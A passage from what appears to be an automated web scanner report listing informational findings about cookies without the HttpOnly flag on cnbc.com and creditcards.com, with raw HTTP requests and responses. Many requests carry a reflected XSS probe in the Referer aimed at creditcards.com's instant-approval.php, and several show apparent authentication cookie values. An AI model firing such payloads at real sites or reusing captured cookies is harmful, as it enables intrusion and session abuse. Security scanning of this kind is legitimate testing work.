Cookie: TZM=-300; __qca=P0-1930011807-1308223509319; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcfwcIjbpx6oavD2kfJnP5bVkxk6xoqhqtJ51GgiLa6GY%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H36GjdQ8YvVYE=; xaikeeperua=yes; USERFONTSIZE=1; s_cc=true; s_nr=1308225270301; s_sq=%5B%5BB%5D%5D; adops_master_kvs=qsg%3D2168%3Bqsg%3D2006%3Bqsg%3D2005%3Bqsg%3D2004%3Bqsg%3D2001%3Bqsg%3D1994%3Bqsg%3D1962%3Bqsg%3D1914%3Bqsg%3D384%3Bqsg%3D381%3Bqsg%3D380%3Bqsg%3D379%3Bqsg%3D378%3Bqsg%3D377%3Bqsg%3D333%3Bqsg%3D332%3Bqsg%3D326%3Bqsg%3D321%3Bqsg%3D316%3B; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; adops_audsci=; cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbRdq6VATa6RRTntkOwVeSxMKMkoytxM7f0miPeiNE4Qig%3d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbRbw6uffmpB0AxANyuATTD5aMkoytxM7f0miPeiNE4Qig%3d; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 12:00:27 GMT
Via: 1.1 C aicache6
Content-Length: 6661
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 12:00:33 GMT

<div class="confirm_error clr" id="com_submit_success" style="display:none;"><br/><br/><strong>Thank you for joining our discussion. Your comment has been posted.</strong><br/><br/></div><div id="add_
...[SNIP]...

11.337. http://www.cnbc.com/id/43422860 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcgEdRxwdvCWSr%2f7fIsAY2%2b%2bQziygfeZY8BKoov1vM6pY%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3cNUyzTRFJJY=; path=/
cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbR56DOITjy6c466EIXOSSo%2f6MkoytxM7f0miPeiNE4Qig%3d; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/43422860 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbR05vbq%2fTokqT%2bGx%2fsrPQZzaMkoytxM7f0miPeiNE4Qig%3d; USERFONTSIZE=1; __qca=P0-1930011807-1308223509319; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcfNEQi5IUJ6k9xLV0%2bZ4rtbQGyK0XRFgQxU4l7b5ea6c%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3Bs6474TL1Tg=; s_cc=true; adops_master_kvs=qsg%3D2168%3Bqsg%3D2006%3Bqsg%3D2005%3Bqsg%3D2004%3Bqsg%3D2001%3Bqsg%3D1994%3Bqsg%3D1962%3Bqsg%3D1914%3Bqsg%3D384%3Bqsg%3D381%3Bqsg%3D380%3Bqsg%3D379%3Bqsg%3D378%3Bqsg%3D377%3Bqsg%3D333%3Bqsg%3D332%3Bqsg%3D326%3Bqsg%3D321%3Bqsg%3D316%3B; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; adops_audsci=; cnbc_regional_cookie=US; s_nr=1308225260679; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/43422860%2526ot%253DA

Response

11.338. http://www.cnbc.com/redirect.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/redirect.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OREF=http://cnbc.com/; expires=Thu, 16-Jun-2011 11:25:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirect.aspx?to=http%3a%2f%2fwww.cnbc.com%2f&from=http%3a%2f%2fcnbc.com%2f&mskey=c9d368404b416e51b4680f887a411820 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.cnbc.com/
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: OREF=http://cnbc.com/; expires=Thu, 16-Jun-2011 11:25:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:24:40 GMT
Via: 1.1 aicache6
Content-Length: 410
X-Aicache-OS: 65.55.53.237:80
Connection: close

<HTML>
   <HEAD>
   </HEAD>
   <body onload="Redirect();">
       <form name="myForm" method="post" action="redirect.aspx?to=http%3a%2f%2fwww.cnbc.com%2f&from=http%3a%2f%2fcnbc.com%2f&mskey=c9d3684
...[SNIP]...

11.339. http://www.creditcards.com/css/credit-cards-print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/css/credit-cards-print.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309658639528; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/credit-cards-print.css HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:20:58 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "79f10b-4a9c-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 19100
Vary: Accept-Encoding
Content-Type: text/css
Set-Cookie: Apache=66.219.46.81.1308309658639528; path=/
Set-Cookie: SSBAL=node.web1; path=/

BODY {
   background: #ffffff;
   font-family: Arial, Helvetica, sans-serif;
}

TABLE {
   width: 100%;
}

h1 {
   font: bold 20px Arial, Helvetica, sans-serif;
   color: #000066;
   text-align: left;
   margin: 0;
...[SNIP]...

11.340. http://www.creditcards.com/css/credit-cards.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/css/credit-cards.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307386129300; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/credit-cards.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:06 GMT
Server: Apache
Last-Modified: Wed, 15 Jun 2011 17:23:09 GMT
ETag: "9ef079-8f46-4a5c36801d940"
Accept-Ranges: bytes
Content-Length: 36678
Vary: Accept-Encoding
Content-Type: text/css
Set-Cookie: Apache=66.219.46.81.1308307386129300; path=/
Set-Cookie: SSBAL=node.web2; path=/

body {
   margin: -1px 0 5px 0;
   padding: 0px 0 5px 0;
   background: #003063 url(/images/blue-bg.gif) repeat-x left top;
   font-family: Arial, Helvetica, sans-serif;
}

a:link, a:visited {
col
...[SNIP]...

11.341. http://www.creditcards.com/images/404-footer-security-lock.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/404-footer-security-lock.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309664247753; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/404-footer-security-lock.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:04 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "796293-381e-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 14366
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309664247753; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a/.4.....5h...=c.......d...Gw.........Ux.}......>o......)T....Mp.............^........v........Im.......1Y...................Cj....Oq.Z}.......x..!Lz...h...........Z{..@q...?f.............|..r...
...[SNIP]...

11.342. http://www.creditcards.com/images/Best-Credit-Cards.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/Best-Credit-Cards.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309666428418; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/Best-Credit-Cards.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:06 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "9e5d64-451-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 1105
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309666428418; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a...............b...q..Uk....viP.....Y......E]..........!.......,.............I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:.G....Z.........F..(....z.n...........C<...~k....]7.j.. |f.._...e.l.U_.
...[SNIP]...

11.343. http://www.creditcards.com/images/Credit-Cards-Compare.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/Credit-Cards-Compare.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661963480; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/Credit-Cards-Compare.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Mon, 18 May 2009 15:25:01 GMT
ETag: "dbc903-5d2-46a3165d14d40"
Accept-Ranges: bytes
Content-Length: 1490
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661963480; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a{. ........55.......ii....ff..........//.CC....TT.SS.......OO.............AA................II.......::....99.......>>.++...................FF....&&.DD.33................................C......i
...[SNIP]...

11.344. http://www.creditcards.com/images/Credit-Cards-Instant-Approval.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/Credit-Cards-Instant-Approval.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661962193; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/Credit-Cards-Instant-Approval.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "7963de-67e-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 1662
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661962193; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89aA.A....................................................................................................!.......,....A.A....`&.di..u].....8A..x..Y...HD0).............,.$..6;..:.Kt\.x.....n...x.09
...[SNIP]...

11.345. http://www.creditcards.com/images/Credit-Cards-Search.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/Credit-Cards-Search.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661963808; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/Credit-Cards-Search.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Mon, 18 May 2009 15:25:01 GMT
ETag: "4b6d33-57a-46a3165d14d40"
Accept-Ranges: bytes
Content-Length: 1402
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661963808; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89ad. .....;;....bb..........)).......]]..........XX.ZZ....ii.........................55....11....--.SS....OO................AA..........UU....II...........................................FF.......
...[SNIP]...

11.346. http://www.creditcards.com/images/accept-credit-cards.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/accept-credit-cards.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309665539549; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/accept-credit-cards.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:05 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "9e5922-73e-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 1854
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309665539549; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a........3f....Dy...0Y.....6h.L.Sw.
?r...... R..J{Dl.....=qg......P.....Bs...7_....`.....Ps.p.. My.......Gz@f....'U.Lq.......Xy.j..y..(S~.Ft......a..Rs.<q...:a.......Im.0\....\. :k'W....k...5h.
...[SNIP]...

11.347. http://www.creditcards.com/images/apply-credit-cards.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/apply-credit-cards.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661966158; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/apply-credit-cards.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Mon, 18 May 2009 15:25:01 GMT
ETag: "4b6d34-5a8-46a3165d14d40"
Accept-Ranges: bytes
Content-Length: 1448
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661966158; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a^. .....ii...................vv....RR....FF.bb....<<.NN......................\\.............XX....ZZ..........55.TT.............II.++.... ....AA..........//..........--.**.............!!.&&.33.
...[SNIP]...

11.348. http://www.creditcards.com/images/apply-now.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/apply-now.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309665835161; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/apply-now.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:05 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "9e5c45-31e-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 798
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309665835161; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a_.......++.........JJJ.KK.zz...................``.77...................kk.[[...................DD.tt...!.......,...._...... ".di.h..l..p,.tm....|....pH.....r.l:...tJ.>.$.....(.,.K..(..y..lG..+r.
...[SNIP]...

11.349. http://www.creditcards.com/images/bank-credit-cards.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/bank-credit-cards.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661395413; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/bank-credit-cards.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:32 GMT
ETag: "796790-73a-4671230c2fd00"
Accept-Ranges: bytes
Content-Length: 1850
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661395413; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a........3fz...Fw....T|.:k...Sy..P..?r.........Ei..L.d........ <p....Dx...=`..J|Lq.*T.l........z..!J....@c..<k... Jv.?n.R.[x..>r...Fm.k..*Y.Rs.............7a..Bs`}..Ex/Z.m...G{......Pu.....DtLl..
...[SNIP]...

11.350. http://www.creditcards.com/images/blue-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/blue-bg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307390776446; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/blue-bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:10 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "7964a6-5be-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 1470
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307390776446; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89a........0c2e..2e.1d.3f3f..H{1d..a..5h)\..6i.7j&X.0c..=p.P.,_..Q.+].)[..N..?r.7j
;n$V..Bu.M..`.+^..<o.M. S.!S.&Y."T..?r.H{ 9l.Fy.O.#U.(Z.1c..4h.3f.Cv.At.4g.I| :m.8k.L~3f. R..J|.J}/b.-_..5h'Y..1e"
...[SNIP]...

11.351. http://www.creditcards.com/images/cccom_logo_114x44.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/cccom_logo_114x44.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308307387661859; path=/
SSBAL=node.web1; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/cccom_logo_114x44.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:43:07 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "796876-3a1-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 929
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308307387661859; path=/
Set-Cookie: SSBAL=node.web1; path=/

GIF89ar.,...........oo.11.......PP...........@@....!!.``.............pp....................................!.......,....r.,....`".di.h*:..0.*.tm....|....pH4...d..+:..R..RZ}..v......u..r.N.A`&=".....
...[SNIP]...

11.352. http://www.creditcards.com/images/credit-card-news-and-advice.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/images/credit-card-news-and-advice.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache=66.219.46.81.1308309661959698; path=/
SSBAL=node.web2; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/credit-card-news-and-advice.gif HTTP/1.1
Host: www.creditcards.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaaa9c6466f9=1

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:21:01 GMT
Server: Apache
Last-Modified: Wed, 08 Apr 2009 21:55:33 GMT
ETag: "9e5d3f-8ed-4671230d23f40"
Accept-Ranges: bytes
Content-Length: 2285
Content-Type: image/gif
Set-Cookie: Apache=66.219.46.81.1308309661959698; path=/
Set-Cookie: SSBAL=node.web2; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

11.353. http://www.creditcards.com/images/credit-card-offer-amex.gif previous next

Summary

Severity:	Information
